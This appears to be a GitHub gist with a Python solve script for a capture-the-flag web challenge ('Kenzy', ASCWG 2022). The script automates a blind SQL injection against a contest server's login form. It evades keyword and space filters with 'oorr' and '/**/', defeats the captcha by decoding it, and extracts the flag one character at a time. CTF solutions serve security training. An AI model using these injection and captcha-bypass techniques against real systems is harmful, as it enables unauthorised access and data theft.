Skip to content

Instantly share code, notes, and snippets.

@seifallahhomrani1
Last active August 6, 2022 15:12
Show Gist options
  • Select an option

  • Save seifallahhomrani1/6789ab4e8f66f8e46f405e3d9285b60d to your computer and use it in GitHub Desktop.

Select an option

Save seifallahhomrani1/6789ab4e8f66f8e46f405e3d9285b60d to your computer and use it in GitHub Desktop.
Kenzy Web Challenge from Arab Security Cyber Wargames Championships 2022
import requests
import base64
import string
addr = "http://34.175.249.72:60001"
flag = ""
for l in range(1,50):
for c in string.printable[:-6]:
#final payload to extract the flag
# /**/ to bypass ' ' filter
# oorr to bypass or filter
payload = f"a'/**/oorr/**/{ord(c)}=(select/**/ascii(substr(flag,{l},1))/**/from/**/solve)#"
#previous payloads can be constructed from https://defendtheweb.net/article/blind-sql-injection
s = requests.Session()
#captcha will be generated on every session
s.get(addr)
captcha = s.get(addr+'/scripts/captcha.php') # getting the captcha response
encoded = (captcha.text[len(captcha.text)-13:-1]).encode('utf-8') # preparing the encoded captcha
final = base64.b64decode((base64.b64decode(encoded))) # decoding
h = s.post(addr,data={'username':'admin','password':payload,'captcha':final,'send':'Send'}) # username and password are both vulnerable to blind sqli
if 'username' not in h.text : # checking errors
flag+=c
print('Flag:', flag)
break
print(flag) #ASCWG{23fsdc$@#EAScasq12_hard}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment